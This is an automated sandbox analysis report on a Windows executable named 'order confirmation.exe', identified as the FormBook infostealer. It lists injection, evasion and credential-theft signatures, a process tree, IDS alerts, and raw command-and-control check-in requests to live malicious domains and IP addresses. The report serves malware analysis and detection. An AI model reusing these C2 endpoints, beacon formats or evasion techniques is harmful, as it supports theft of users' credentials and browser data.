Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
order confirmation.exe

Overview

General Information

Sample name:order confirmation.exe
Analysis ID:1575107
MD5:8d4459233467bbcf973541c6b17091d7
SHA1:e1a6e0be6aa2e7aa77c9f5f3c394d62c749c2b06
SHA256:1bd11bb8886ef9aaaa8a59425f2fce8517a476dcb328751f8c39512cf719f2da
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • order confirmation.exe (PID: 2300 cmdline: "C:\Users\user\Desktop\order confirmation.exe" MD5: 8D4459233467BBCF973541C6B17091D7)
    • order confirmation.exe (PID: 1384 cmdline: "C:\Users\user\Desktop\order confirmation.exe" MD5: 8D4459233467BBCF973541C6B17091D7)
    • order confirmation.exe (PID: 3120 cmdline: "C:\Users\user\Desktop\order confirmation.exe" MD5: 8D4459233467BBCF973541C6B17091D7)
      • XDBtzWJieMe.exe (PID: 2068 cmdline: "C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchProtocolHost.exe (PID: 2508 cmdline: "C:\Windows\SysWOW64\SearchProtocolHost.exe" MD5: 727FE964E574EEAF8917308FFF0880DE)
          • XDBtzWJieMe.exe (PID: 2648 cmdline: "C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1308 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.order confirmation.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.order confirmation.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T13:50:26.831562+010028554651A Network Trojan was detected192.168.2.84971527.124.4.24680TCP
                2024-12-14T13:50:53.267883+010028554651A Network Trojan was detected192.168.2.849761156.232.181.15580TCP
                2024-12-14T13:51:08.315517+010028554651A Network Trojan was detected192.168.2.849800185.27.134.20680TCP
                2024-12-14T13:51:23.825390+010028554651A Network Trojan was detected192.168.2.84983688.99.61.5280TCP
                2024-12-14T13:51:39.039809+010028554651A Network Trojan was detected192.168.2.849877104.21.90.13780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T13:50:45.112946+010028554641A Network Trojan was detected192.168.2.849743156.232.181.15580TCP
                2024-12-14T13:50:47.769352+010028554641A Network Trojan was detected192.168.2.849749156.232.181.15580TCP
                2024-12-14T13:50:50.425470+010028554641A Network Trojan was detected192.168.2.849755156.232.181.15580TCP
                2024-12-14T13:51:00.169850+010028554641A Network Trojan was detected192.168.2.849777185.27.134.20680TCP
                2024-12-14T13:51:02.982857+010028554641A Network Trojan was detected192.168.2.849785185.27.134.20680TCP
                2024-12-14T13:51:05.643181+010028554641A Network Trojan was detected192.168.2.849794185.27.134.20680TCP
                2024-12-14T13:51:15.940564+010028554641A Network Trojan was detected192.168.2.84981588.99.61.5280TCP
                2024-12-14T13:51:18.496919+010028554641A Network Trojan was detected192.168.2.84982188.99.61.5280TCP
                2024-12-14T13:51:21.155464+010028554641A Network Trojan was detected192.168.2.84982988.99.61.5280TCP
                2024-12-14T13:51:30.429742+010028554641A Network Trojan was detected192.168.2.849854104.21.90.13780TCP
                2024-12-14T13:51:33.099346+010028554641A Network Trojan was detected192.168.2.849860104.21.90.13780TCP
                2024-12-14T13:51:35.775082+010028554641A Network Trojan was detected192.168.2.849866104.21.90.13780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.5tuohbpzyj9.buzz/abgi/Avira URL Cloud: Label: malware
                Source: http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5Avira URL Cloud: Label: malware
                Source: http://www.5tuohbpzyj9.buzz/abgi/?KX=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNtflpkpcb0CVjulSXUCscL7c5c6O3wfheXeqQy3IVMD/Pg==&2VqtG=K0rLevU0Wh5tIJEpAvira URL Cloud: Label: malware
                Source: http://www.canadavinreport.site/4d2l/Avira URL Cloud: Label: malware
                Source: http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w==Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: order confirmation.exeReversingLabs: Detection: 63%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.order confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.order confirmation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2820915719.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1984356146.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: order confirmation.exeJoe Sandbox ML: detected
                Source: order confirmation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: order confirmation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XDBtzWJieMe.exe, 00000008.00000002.2819410529.0000000000EBE000.00000002.00000001.01000000.0000000C.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2820406568.0000000000EBE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: order confirmation.exe, 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1991485419.000000000332E000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1983337784.0000000003179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: order confirmation.exe, order confirmation.exe, 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1991485419.000000000332E000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1983337784.0000000003179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdbUGP source: XDBtzWJieMe.exe, 00000008.00000003.1919507373.0000000000FFB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdb source: XDBtzWJieMe.exe, 00000008.00000003.1919507373.0000000000FFB000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009FC860 FindFirstFileW,FindNextFileW,FindClose,9_2_009FC860
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then xor eax, eax9_2_009E9EA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then mov ebx, 00000004h9_2_033C04E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49715 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49749 -> 156.232.181.155:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49800 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49785 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49794 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49815 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49836 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49743 -> 156.232.181.155:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49761 -> 156.232.181.155:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49821 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49777 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49854 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49860 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49829 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49866 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49877 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49755 -> 156.232.181.155:80
                Source: Joe Sandbox ViewIP Address: 27.124.4.246 27.124.4.246
                Source: Joe Sandbox ViewIP Address: 156.232.181.155 156.232.181.155
                Source: Joe Sandbox ViewIP Address: 185.27.134.206 185.27.134.206
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /8s5b/?KX=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYqRwUDZc0hQ5nlduAuRdjiHqVHSyH0yZGbg1OgG3wMBkWQ==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1Host: www.laohub10.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /abgi/?KX=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNtflpkpcb0CVjulSXUCscL7c5c6O3wfheXeqQy3IVMD/Pg==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1Host: www.5tuohbpzyj9.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w== HTTP/1.1Host: www.canadavinreport.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /ogj2/?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9T9LUB2i2IiSBd7rmeCdeR22hTga1oxsx30/DDEHjEXz3Vw==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1Host: www.phoenix88.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /eaqq/?KX=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYqX2P65hLvXSZ3fWNCCIV/k5d2IdbBS66sOXN5gLen/wBg==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1Host: www.ana-silverco.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.5tuohbpzyj9.buzz
                Source: global trafficDNS traffic detected: DNS query: www.canadavinreport.site
                Source: global trafficDNS traffic detected: DNS query: www.phoenix88.sbs
                Source: global trafficDNS traffic detected: DNS query: www.ana-silverco.shop
                Source: unknownHTTP traffic detected: POST /abgi/ HTTP/1.1Host: www.5tuohbpzyj9.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Origin: http://www.5tuohbpzyj9.buzzContent-Length: 203Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.5tuohbpzyj9.buzz/abgi/User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+Data Raw: 4b 58 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 61 4d 6c 59 75 6d 48 52 4e 77 34 34 75 5a 46 4e 69 32 61 53 58 66 52 6a 35 35 36 6c 2f 4d 46 30 54 31 4a 4a 7a 41 70 32 75 4a 54 48 55 61 59 42 6e 79 51 57 46 4c 66 45 4c 56 59 79 52 42 4f 53 4d 47 51 79 78 4b 6b 4e 2b 4b 61 6f 55 6c 39 48 56 62 71 6d 4e 4a 50 45 31 47 6f 66 59 48 69 33 73 44 73 72 43 50 34 56 6d 65 79 47 42 43 49 64 64 75 50 56 42 5a 38 79 77 61 63 6e 4f 35 59 48 75 72 50 38 4d 67 77 58 74 33 34 37 47 63 67 30 6e 53 2b 63 72 55 59 33 67 35 2b 44 46 75 4b 4b 58 62 6e 31 35 47 38 49 51 4a 48 5a 4b 37 61 62 46 6a 2f 68 43 68 67 71 6d 6f 3d Data Ascii: KX=GqE9dwVezIHb5aMlYumHRNw44uZFNi2aSXfRj556l/MF0T1JJzAp2uJTHUaYBnyQWFLfELVYyRBOSMGQyxKkN+KaoUl9HVbqmNJPE1GofYHi3sDsrCP4VmeyGBCIdduPVBZ8ywacnO5YHurP8MgwXt347Gcg0nS+crUY3g5+DFuKKXbn15G8IQJHZK7abFj/hChgqmo=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 Dec 2024 12:50:52 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:51:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yK8E%2B8UBoJRuCE4OSXsnnXc3Ych%2Fhv2j0OlMsLkw3cvTGlAbOmraMdY7C%2BaL8FJE5zkYyCItsvnMjLqT34%2B7QP0maBRCqbCFYYV2cBzNwZJmms%2FVTfuNAp0rowzvARfAwSqq8vqDY1Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1e5361c80043c2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1678&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:51:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KfRJUbqGH0yvBdTV9ZcLlgsOh3ochM2JEFIPFVa2BBbnuKUaaxJWYuc4jGWuSucqHv35cCu3NSx52XfBbxdz7p7d5dQ2ghy48LpPv9ibygaW3XWJ9%2FAaOvYpnThrgozxWPwOr%2B3dbiI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1e53727bec435e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:51:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8d%2BxpHOsorakXoxc6p6pSeCntTTnPXUKwqtys3ACiUgOHSL7yfLWEFfSuxnqKihgQqY8GOBESJ9CuBXQbVLV6NbYw4IUrRXq%2BeejTNbcZh3LVLFNy8csV%2BuntGpBZzE%2BM2wO7HJr4oI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1e53833d127293-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2099&min_rtt=2099&rtt_var=1049&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1825&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:51:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1FD134R3%2BCEJSevsZ9VEl5FVBIJrcxP%2FnXm3fRXbhgEAMfmmIezQ905Z1AJE%2FQOiSxybGgBVulvi1GkOX%2B1Ls16yVmupTVi3t915VSiLhSsYDizOdv9CsXN7X2rXCDfRfm6CgSm0m40%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1e5397aa5841af-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2211&min_rtt=2211&rtt_var=1105&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=529&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 